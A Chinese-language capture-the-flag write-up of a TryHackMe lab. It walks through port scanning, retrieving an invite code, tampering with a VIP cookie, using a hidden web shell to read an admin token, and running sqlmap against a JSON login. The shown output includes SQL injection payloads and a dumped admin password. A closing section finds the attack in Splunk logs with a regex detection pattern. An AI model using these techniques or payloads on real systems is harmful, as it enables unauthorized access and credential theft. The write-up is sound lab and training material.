打靶记录(一一五)之THMTryHack3M_Subscribe

Exploitation

端口扫描

└─# nmap --min-rate=10000 -p- hackme.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-31 03:39 UTC
Nmap scan report for hackme.thm (10.10.68.180)
Host is up (0.0051s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8000/tcp  open  http-alt
8089/tcp  open  unknown
8191/tcp  open  limnerpressure
40009/tcp open  unknown
MAC Address: 02:3F:0B:D7:B0:DF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.53 seconds

└─# nmap -sV -sT -sC -P -p22,80,8000,8089,8191,40009 hackme.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-31 03:42 UTC
Nmap scan report for hackme.thm (10.10.68.180)
Host is up (0.00034s latency).

PORT      STATE SERVICE         VERSION
22/tcp    open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9904368a9e0d3624fed8971fb18c1401 (RSA)
|   256 38f61ec97035a36f6b813607b357d690 (ECDSA)
|_  256 21ea7824538f3106219105c6eb8994f1 (ED25519)
80/tcp    open  http            Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Hack3M | Cyber Security Training
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp  open  http            Splunkd httpd
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://hackme.thm:8000/en-US/account/login?return_to=%2Fen-US%2F
| http-robots.txt: 1 disallowed entry 
|_/
8089/tcp  open  ssl/http        Splunkd httpd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2024-04-05T11:00:59
|_Not valid after:  2027-04-05T11:00:59
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
8191/tcp  open  limnerpressure?
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Connection: close
|     Content-Type: text/plain
|     Content-Length: 85
|_    looks like you are trying to access MongoDB over HTTP on the native driver port.
40009/tcp open  http            Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.93%I=7%D=5/31%Time=6659474D%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,A9,"H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n");
MAC Address: 02:3F:0B:D7:B0:DF (Unknown)
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.33 seconds

需要寻找一个invite code,发现一个invite.js

function e() {
    var e = window.location.hostname;
    if (e === "capture3millionsubscribers.thm") {
        var o = new XMLHttpRequest;
        o.open("POST", "inviteCode1337HM.php", true);
        o.onload = function() {
            if (this.status == 200) {
                console.log("Invite Code:", this.responseText)
            } else {
                console.error("Error fetching invite code.")
            }
        };
        o.send()
    } else if (e === "hackme.thm") {
        console.log("This function does not operate on hackme.thm")
    } else {
        console.log("Lol!! Are you smart enought to get the invite code?")
    }
}

如果当前域名是capture3millionsubscribers.thm那么会调用inviteCode1337HM.php,那么添加到hosts

然后在console中调用e函数:

e()

得到Invite Code: VkXgo:Invited30MnUsers

输入invitecode之后得到:

guest@hackme.thm:wedidit1010

进行登录，发现storage里面有一个“isVIP”的cookie,设置成”true”之后就可以访问VIP房间,然而”开启机器”后会弹出不是vip用户的弹窗，查看源码

 // sc-drFUgV fXEjrf
  $(document).ready(function() {
	

    $('#start_machine').click(function(e) {  
 	var isVIPE = document.getElementById("isVIP");
var isVIP = (isVIPE.value.toLowerCase() === 'true');
 if(isVIP){
      $("#splitScreenRight").attr("class", "sc-drFUgV bROZdw");
      $("#main1").attr("class", "sc-bKNmIE bYiuLB");
      $("#main2").attr("class", "sc-hZDbVM bksodH");
      $("#nav1").attr("class", "sc-krITIZ gMgnKr");
 }
 else{
alert("This page is only for VIP users")
}
    });


 
  });

  $(document).ready(function() {
    $('#exit_split').click(function(e) {  
      $("#splitScreenRight").attr("class", "sc-drFUgV fXEjrf");
      $("#main1").attr("class", "sc-bKNmIE ipXaXG");
      $("#main2").attr("class", "sc-hZDbVM hgVIhb");
      $("#nav1").attr("class", "sc-krITIZ hoLoqS");
    });
  });

似乎还不是vip，在源码中还有一个目录BBF813FA941496FCE961EBA46D754FF3.php

访问发现是一个shell页面,但是有很多命令被禁止了,但是ls,cat能够使用

在config.php中找到了admin的入口

<?php

$SECURE_TOKEN= "ACC#SS_TO_ADM1N_P@NEL";

$urlAdminPanel= "http://admin1337special.hackme.thm:40009";

?>

添加hosts之后访问这个界面，提示403

http://admin1337special.hackme.thm:40009/public/html/login

输入TOKEN之后能够进行登录,没有任何凭据，尝试sqlmap一把梭

└─$ sqlmap -r 1 --dump --batch
        ___
       __H__                                                                                                                  
 ___ ___[']_____ ___ ___  {1.8.2#stable}                                                                                      
|_ -| . [,]     | .'| . |                                                                                                     
|___|_  [(]_|_|_|__,|  _|                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:29:38 /2024-05-31/

[05:29:38] [INFO] parsing HTTP request from '1'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[05:29:38] [INFO] resuming back-end DBMS 'mysql' 
[05:29:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON username ((custom) POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: {"username":"1' AND EXTRACTVALUE(2170,CASE WHEN (2170=2170) THEN 2170 ELSE 0x3A END)-- qTbc","password":"1"}

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: {"username":"1' AND GTID_SUBSET(CONCAT(0x716b717171,(SELECT (ELT(1533=1533,1))),0x717a787671),1533)-- tEwu","password":"1"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"1' AND (SELECT 8282 FROM (SELECT(SLEEP(5)))ECeH)-- NigY","password":"1"}
---
[05:29:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6
[05:29:39] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[05:29:39] [INFO] fetching current database
[05:29:39] [INFO] retrieved: 'hackme'
[05:29:39] [INFO] fetching tables for database: 'hackme'
[05:29:40] [INFO] retrieved: 'config'
[05:29:40] [INFO] retrieved: 'users'
[05:29:40] [INFO] fetching columns for table 'users' in database 'hackme'
[05:29:41] [INFO] retrieved: 'id'
[05:29:41] [INFO] retrieved: 'int'
[05:29:41] [INFO] retrieved: 'username'
[05:29:42] [INFO] retrieved: 'varchar(50)'
[05:29:42] [INFO] retrieved: 'password'
[05:29:43] [INFO] retrieved: 'varchar(255)'
[05:29:43] [INFO] retrieved: 'email'
[05:29:44] [INFO] retrieved: 'varchar(100)'
[05:29:44] [INFO] retrieved: 'name'
[05:29:45] [INFO] retrieved: 'varchar(300)'
[05:29:45] [INFO] retrieved: 'role'
[05:29:45] [INFO] retrieved: 'varchar(20)'
[05:29:46] [INFO] retrieved: 'status'
[05:29:46] [INFO] retrieved: 'varchar(100)'
[05:29:46] [INFO] fetching entries for table 'users' in database 'hackme'
[05:29:47] [INFO] retrieved: 'Admin User'
[05:29:48] [INFO] retrieved: 'admin'
[05:29:48] [INFO] retrieved: '1'
[05:29:50] [INFO] retrieved: 'admin@hackme.thm'
[05:29:50] [INFO] retrieved: '1'
[05:29:50] [INFO] retrieved: 'adminisadm1n'
[05:29:51] [INFO] retrieved: 'admin'
Database: hackme
Table: users
[1 entry]
+----+------------------+------------+--------+----------+--------------+----------+
| id | email            | name       | role   | status   | password     | username |
+----+------------------+------------+--------+----------+--------------+----------+
| 1  | admin@hackme.thm | Admin User | admin  | 1        | adminisadm1n | admin    |
+----+------------------+------------+--------+----------+--------------+----------+

登录之后选择sigh up，成功添加一命用户达到3M。

回到80端口web页面，得到flag

Detection

使用凭证登录splunk

在”search”中index=*索引选择全部，然后”all time”，共有10530条日志

在user-agent中找到sqlmap,确认攻击者使用了sqlmap,并且源IP为83.45.212.17

index=* source_ip="83.45.212.17" 

但是似乎并不是所有日志都是用于攻击的日志。所以还要进行筛选，实际的攻击日志是包括sqlmap和手动SQL注入的日志

index=* user_agent="sqlmap/1.2.4#stable (http://sqlmap.org)" | regex _raw="(\b(SELECT|UNION|INSERT|DELETE|UPDATE)\b|['\";\\-\\-])" | table _time, host, src_ip, uri, _raw

共158条攻击日志

通过查看手动SQL注入的payload得到表名是TryHack3M_users